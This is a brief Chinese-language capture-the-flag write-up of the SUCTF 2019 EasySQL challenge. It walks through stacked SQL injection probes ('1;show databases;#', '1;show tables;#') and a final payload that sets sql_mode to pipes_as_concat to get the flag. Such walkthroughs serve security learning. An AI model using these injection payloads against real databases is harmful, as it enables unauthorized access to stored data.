题目提示如下。
猜测后台语句是设置为仅在用户输入与 flag
完全一致时才输出 flag
。
尝试输入:1;show databases;#
,发现存在堆叠注入。
输入:1;show tables;#
,获取当前存在的数据表。
尝试输入:1;show columns from
Flag;#
,经过对比,发现 from
与 Flag
被过滤,这里无法绕过。结合提示,猜测后台的查询语句可能为:$sql = "select ".$post['query']."||flag from Flag";
,sql_mode=pipes_as_concat
会让 ||
变成类似 concat()
函数,因此Payload
:1;set sql_mode=pipes_as_concat;select 1
。
[SUCTF 2019]EasySQL
发布时间 2023-10-31 17:40:03作者: imtaieee